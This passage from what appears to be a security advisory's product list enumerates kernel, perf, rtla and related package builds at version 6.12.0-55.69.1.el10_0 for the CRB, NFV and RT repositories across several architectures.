"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
